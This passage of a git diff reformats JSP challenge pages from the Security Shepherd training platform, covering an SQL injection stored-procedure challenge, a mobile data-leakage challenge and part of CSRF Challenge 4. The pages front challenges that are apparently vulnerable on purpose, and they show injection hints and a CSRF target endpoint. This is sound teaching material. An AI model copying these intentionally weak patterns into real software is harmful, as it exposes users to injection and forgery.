+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7.jsp b/src/main/webapp/challenges/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7.jsp
index a2b6a848d..36f07f2fa 100644
--- a/src/main/webapp/challenges/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7.jsp
+++ b/src/main/webapp/challenges/7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7.jsp
@@ -1,166 +1,173 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * SQL Injection Challenge Stored Proc
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * SQL Injection Challenge Stored Proc
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
-    String levelName = "SQL Injection Stored Procedure Challenge";
-    String levelHash = "7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7";
-
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge.challengeName");
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ String levelName = "SQL Injection Stored Procedure Challenge";
+ String levelHash = "7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7";
+ 
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("challenge.challengeName");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-    <div id="hint" style="display: none;">
-        <h2 class="title"><%= bundle.getString("challenge.hint") %>
-        </h2>
-        <%= bundle.getString("challenge.hint.description") %>
-        <br/> <br/>
-        <div>
-            call findUser('<a id="userContent"></a>');
-        </div>
-        <br/> <br/>
-    </div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+		<div id="hint" style="display: none;">
+			<h2 class="title"><%= bundle.getString("challenge.hint") %></h2>
+			<%= bundle.getString("challenge.hint.description") %>
+			<br /> <br />
+			<div>
+				call findUser('<a id="userContent"></a>');
+			</div>
+			<br /> <br />
+		</div>
 
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.pleaseEnter") %><a><%= bundle.getString("challenge.form.customerName") %>
-                </a>
-                    <%= bundle.getString("challenge.form.userLookUp") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="userIdentity" type="text"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.getUser") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button" value="<%= bundle.getString("sign.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.pleaseEnter") %><a><%= bundle.getString("challenge.form.customerName") %></a>
+						<%= bundle.getString("challenge.form.userLookUp") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="userIdentity" type="text"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.getUser") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+						<div style="display: none;" id="hintButton">
+							<input type="button" value="<%= bundle.getString("sign.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        counter = counter + 1;
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#userContent").text($("#userIdentity").val());
-        var theName = $("#userIdentity").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    userIdentity: theName
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                    if (counter == 3) {
-                        $("#hintButton").show("slow");
-                    }
-                });
-            });
-        });
-    });
-    $("#userIdentity").change(function () {
-        $("#userContent").text($(this).val());
-    }).change();
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter = 0;
+			$("#leForm").submit(function(){
+				counter = counter + 1;
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#userContent").text($("#userIdentity").val());
+				var theName = $("#userIdentity").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							userIdentity: theName
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+							if (counter == 3)
+							{
+								$("#hintButton").show("slow");
+							}
+						});
+					});
+				});
+			});
+			$("#userIdentity").change(function () {
+				$("#userContent").text($(this).val());
+			}).change();
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/83dee43e50f65876d9c24a9355200f7c10569dc94e51349f7b857fb68b4e6bdf.jsp b/src/main/webapp/challenges/83dee43e50f65876d9c24a9355200f7c10569dc94e51349f7b857fb68b4e6bdf.jsp
index 23d72621b..33798c975 100644
--- a/src/main/webapp/challenges/83dee43e50f65876d9c24a9355200f7c10569dc94e51349f7b857fb68b4e6bdf.jsp
+++ b/src/main/webapp/challenges/83dee43e50f65876d9c24a9355200f7c10569dc94e51349f7b857fb68b4e6bdf.jsp
@@ -1,91 +1,98 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Unintended Data Leakage 1";
+String levelName = "Mobile Unintended Data Leakage 1";
 //Alphanumeric Only
-    String levelHash = "83dee43e50f65876d9c24a9355200f7c10569dc94e51349f7b857fb68b4e6bdf";
+String levelHash = "83dee43e50f65876d9c24a9355200f7c10569dc94e51349f7b857fb68b4e6bdf";
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.mobile.unintendedDataLeakage.dataLeakage" + levelHash, locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.mobile.unintendedDataLeakage.dataLeakage" + levelHash, locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge1.challengeName");
+String translatedLevelName = bundle.getString("challenge1.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString());
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString());
 
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%=translatedLevelName%>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%=translatedLevelName%></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%=translatedLevelName%>
-    </h2>
-    <p>
-        <%= bundle.getString("challenge1.para1") %>
-        <br/> <br/>
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " UDataLeakage2.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
-    </p>
-</div>
-<%
-    if (Analytics.googleAnalyticsOn) {
-%><%=Analytics.googleAnalyticsScript%>
-<%
-    }
-%>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%=translatedLevelName%></h2>
+		<p>
+			<%= bundle.getString("challenge1.para1") %>
+			<br /> <br />
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " UDataLeakage2.apk " + mobile.getString("mobileBlurb.vmLink.2") %>
+		</p>
+	</div>
+	<%
+		if (Analytics.googleAnalyticsOn) {
+	%><%=Analytics.googleAnalyticsScript%>
+	<%
+		}
+	%>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5.jsp b/src/main/webapp/challenges/84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5.jsp
index 3ba4fd238..04adf766d 100644
--- a/src/main/webapp/challenges/84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5.jsp
+++ b/src/main/webapp/challenges/84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5.jsp
@@ -1,186 +1,189 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    // Cross Site Request Forgery Challenge 4
+	// Cross Site Request Forgery Challenge 4
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-    String levelName = "CSRF Challenge 4";
-    String levelHash = "84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5";
+String levelName = "CSRF Challenge 4";
+String levelHash = "84118752e6cd78fecc3563ba2873d944aacb7b72f28693a23f9949ac310648b5";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
-    String i18nLevelName = bundle.getString("title.csrf4");
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
+String i18nLevelName = bundle.getString("title.csrf4");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String ApplicationRoot = getServletContext().getRealPath("");
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String userClass = null;
-            if (ses.getAttribute("userClass") != null) {
-                userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
-            }
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-
-            //Set CSRF Challenge 4 CsrfToken
-            String csrfChal4Token = Setter.setCsrfChallengeFourCsrfToken(userId, Hash.randomString().trim(), ApplicationRoot);
-            ses.setAttribute("csrfChallengeFourNonce", csrfChal4Token);
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String ApplicationRoot = getServletContext().getRealPath("");
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
+		String userClass = null;
+		if(ses.getAttribute("userClass") != null)
+		{
+			userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
+		}
+		String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+		
+		//Set CSRF Challenge 4 CsrfToken
+		String csrfChal4Token = Setter.setCsrfChallengeFourCsrfToken(userId, Hash.randomString().trim(), ApplicationRoot);
+		ses.setAttribute("csrfChallengeFourNonce", csrfChal4Token);
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.intro") %>
-        <br/> <br/> <a> POST /user/csrfchallengefour/plusplus</a> <br/>
-            <%= bundle.getString("challenge.withTheseParameters") %>
-        <a>userId = <%= bundle.getString("challenge.userIdExample") %>
-        </a> &
-        <a>csrfToken = <%= bundle.getString("challenge.yourCsrfTokenCamelCase") %>
-        </a>
-        <br/> <br/>
-            <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>
-            <%= bundle.getString("challenge.userIdExample") %>
-            <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>
-            <%=bundle.getString("challenge.yourIdIs") %>
-            <%= userId %>
-            <%=bundle.getString("challenge.yourCsrfTokenIs") %>
-        <a><%= csrfChal4Token %>
-        </a><%= bundle.getString("challenge.yourIdIs.1") %>
-        <br/> <br/>
-            <%= bundle.getString("challenge.useForumForIframe") %>
-            <%
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.intro") %>
+			<br /> <br /> <a> POST /user/csrfchallengefour/plusplus</a> <br />
+			<%= bundle.getString("challenge.withTheseParameters") %>
+			<a>userId = <%= bundle.getString("challenge.userIdExample") %></a> &
+			<a>csrfToken = <%= bundle.getString("challenge.yourCsrfTokenCamelCase") %></a>
+			<br /> <br />
+			<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>
+			<%= bundle.getString("challenge.userIdExample") %>
+			<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>
+			<%=bundle.getString("challenge.yourIdIs") %>
+			<%= userId %>
+			<%=bundle.getString("challenge.yourCsrfTokenIs") %>
+			<a><%= csrfChal4Token %></a><%= bundle.getString("challenge.yourIdIs.1") %>
+			<br /> <br />
+			<%= bundle.getString("challenge.useForumForIframe") %>
+			<% 
 				String moduleId = Getter.getModuleIdFromHash(ApplicationRoot, levelHash);	
 				if (Getter.isCsrfLevelComplete(ApplicationRoot, moduleId, userId)) 
 				{ %>
+		
+		<h2 class='title'><%= bundle.getString("result.challengeCompleted") %></h2>
+		<p>
+			<%= bundle.getString("result.congratsTheKeyIs") %>
+			<b> <a><%= Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String)ses.getAttribute("userName")) %></a></b><br />
+			<br />
+			<% } %>
+		
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("forum.iframe.whatToDo") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="myMessageAris"
+						type="text" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("forum.postMessage") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <h2 class='title'><%= bundle.getString("result.challengeCompleted") %>
-    </h2>
-    <p>
-            <%= bundle.getString("result.congratsTheKeyIs") %>
-        <b>
-            <a><%= Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String) ses.getAttribute("userName")) %>
-            </a></b><br/>
-        <br/>
-            <% } %>
-
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("forum.iframe.whatToDo") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="myMessageAris"
-                           type="text"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("forum.postMessage") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv">
-        <%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
-    </div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theMessage = $("#myMessageAris").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    myMessage: theMessage,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
